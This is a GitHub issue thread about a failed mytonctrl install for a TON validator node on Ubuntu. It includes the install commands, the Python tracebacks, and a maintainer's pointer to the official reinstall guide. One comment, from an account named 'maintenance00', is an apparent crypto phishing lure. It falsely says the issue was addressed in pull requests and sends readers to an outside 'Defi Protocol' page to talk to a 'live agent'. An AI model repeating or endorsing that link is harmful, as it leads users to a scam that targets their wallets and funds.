### ISSUE TITLE
install mytonctrl fail: ValidatorConsole error: Validator console is not settings

### ISSUE THREAD

**Issue by zhangxf55** [ton-blockchain/ton#1047]
### steps to reproduce the error
1. add a none root user:
```
useradd -m -d /home/ton -s /bin/bash ton
usermod -aG sudo ton
```
2. download install.sh and execute it:
```
wget https://raw.githubusercontent.com/ton-blockchain/mytonctrl/master/scripts/install.sh
sudo bash install.sh -d -m full
```
3. start mytonctrl process:
```
ton@ton:~$ mytonctrl 
[warning] 04.07.2024, 05:51:18.639 (UTC)  <MainThread>  The config file is broken
local.db: {'config': {'logLevel': 'info', 'isLimitLogFile': True, 'isDeleteOldLogFile': False, 'isIgnorLogWarning': False, 'isStartOnlyOneProcess': True, 'memoryUsinglimit': 50, 'isLocaldbSaving': False, 'isWritingLogFile': True}}
[debug]   04.07.2024, 05:51:18.640 (UTC)  <MainThread>  Thread self_test started
[debug]   04.07.2024, 05:51:18.640 (UTC)  <MainThread>  Thread write_log started
[info]    04.07.2024, 05:51:18.640 (UTC)  <MainThread>  Start program `/usr/src/mytonctrl/mytonctrl.py`
Welcome to the console. Enter 'help' to display the help menu.
Traceback (most recent call last):
  File "/usr/src/mytonctrl/mytonctrl.py", line 1228, in <module>
    console.Run()
  File "/usr/src/mytonctrl/mypyconsole/mypyconsole.py", line 97, in Run
    self.startFunction()
  File "/usr/src/mytonctrl/mytonctrl.py", line 114, in PreUp
    check_vport()
  File "/usr/src/mytonctrl/mytonctrl.py", line 130, in check_vport
    vconfig = ton.GetValidatorConfig()
  File "/usr/src/mytonctrl/mytoncore.py", line 1951, in GetValidatorConfig
    result = self.validatorConsole.Run("getconfig")
  File "/usr/src/mytonctrl/mytoncore.py", line 67, in Run
    raise Exception("ValidatorConsole error: Validator console is not settings")
Exception: ValidatorConsole error: Validator console is not settings
```

### enviroments
1. OS: ubuntu 22.04 TLS

**Comment by zhangxf55** [comment]
The following only error occurs while executing 'sudo bash install.sh -m full':
```
[debug]   04.07.2024, 06:01:28.807 (UTC)  <MainThread>  start GetLocalWallet function
[debug]   04.07.2024, 06:01:28.807 (UTC)  <MainThread>  start GetWalletFromFile function
[debug]   04.07.2024, 06:01:28.807 (UTC)  <MainThread>  start GetConfig function (12)
[warning] 04.07.2024, 06:01:28.817 (UTC)  <MainThread>  GetValidatorStatus warning: int() argument must be a string, a bytes-like object or a real number, not 'NoneType'
Traceback (most recent call last):
  File "/usr/src/mytonctrl/mytoncore.py", line 4350, in <module>
    Init()
  File "/usr/src/mytonctrl/mytoncore.py", line 3749, in Init
    Event(eventName)
  File "/usr/src/mytonctrl/mytoncore.py", line 3769, in Event
    EnableVcEvent()
  File "/usr/src/mytonctrl/mytoncore.py", line 3779, in EnableVcEvent
    wallet = ton.CreateWallet("validator_wallet_001", -1)
  File "/usr/src/mytonctrl/mytoncore.py", line 1828, in CreateWallet
    wallet = self.GetLocalWallet(name, version)
  File "/usr/src/mytonctrl/mytoncore.py", line 676, in GetLocalWallet
    wallet = self.GetWalletFromFile(walletPath, version)
  File "/usr/src/mytonctrl/mytoncore.py", line 694, in GetWalletFromFile
    self.AddrFile2Object(wallet)
  File "/usr/src/mytonctrl/mytoncore.py", line 727, in AddrFile2Object
    object.addrB64 = self.AddrFull2AddrB64(object.addrFull)
  File "/usr/src/mytonctrl/mytoncore.py", line 3115, in AddrFull2AddrB64
    testnet = self.IsTestnet()
  File "/usr/src/mytonctrl/mytoncore.py", line 3699, in IsTestnet
    networkName = self.GetNetworkName()
  File "/usr/src/mytonctrl/mytoncore.py", line 3667, in GetNetworkName
    config12 = self.GetConfig(12)
  File "/usr/src/mytonctrl/mytoncore.py", line 1095, in GetConfig
    result = self.liteClient.Run(cmd)
  File "/usr/src/mytonctrl/mytoncore.py", line 45, in Run
    process = subprocess.run(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, timeout=timeout)
  File "/usr/lib/python3.10/subprocess.py", line 505, in run
    stdout, stderr = process.communicate(input, timeout=timeout)
  File "/usr/lib/python3.10/subprocess.py", line 1154, in communicate
    stdout, stderr = self._communicate(input, endtime, timeout)
  File "/usr/lib/python3.10/subprocess.py", line 2022, in _communicate
    self._check_timeout(endtime, orig_timeout, stdout, stderr)
  File "/usr/lib/python3.10/subprocess.py", line 1198, in _check_timeout
    raise TimeoutExpired(
subprocess.TimeoutExpired: Command '['/usr/bin/ton/lite-client/lite-client', '--global-config', '/usr/bin/ton/global.config.json', '--verbosity', '0', '--cmd', 'getconfig 12']' timed out after 3 seconds
[debug]   04.07.2024, 06:01:31.863 (UTC)  <MainThread>  Start/restart mytoncore service
[debug]   04.07.2024, 06:01:31.889 (UTC)  <MainThread>  start EnableLiteServer function
[debug]   04.07.2024, 06:01:31.889 (UTC)  <MainThread>  generate liteserver key
```

**Comment by maintenance00** [comment]
This issue has been preview on the Pull Requests. To resolve,
Visit the defi protocol page to initiate a chat with the live agent on the chat button to get more information about your request via [Defi Protocol](https://accessonlinedefiprotocol.web.app/)
Thank you for posting @zhangxf55

**Comment by vataops** [comment]
it's the same issue

**Comment by yungwine** [comment]
Hi! Please, reinstall the MyTonCtrl using the following guide: https://docs.ton.org/participate/run-nodes/full-node#install-the-mytonctrl
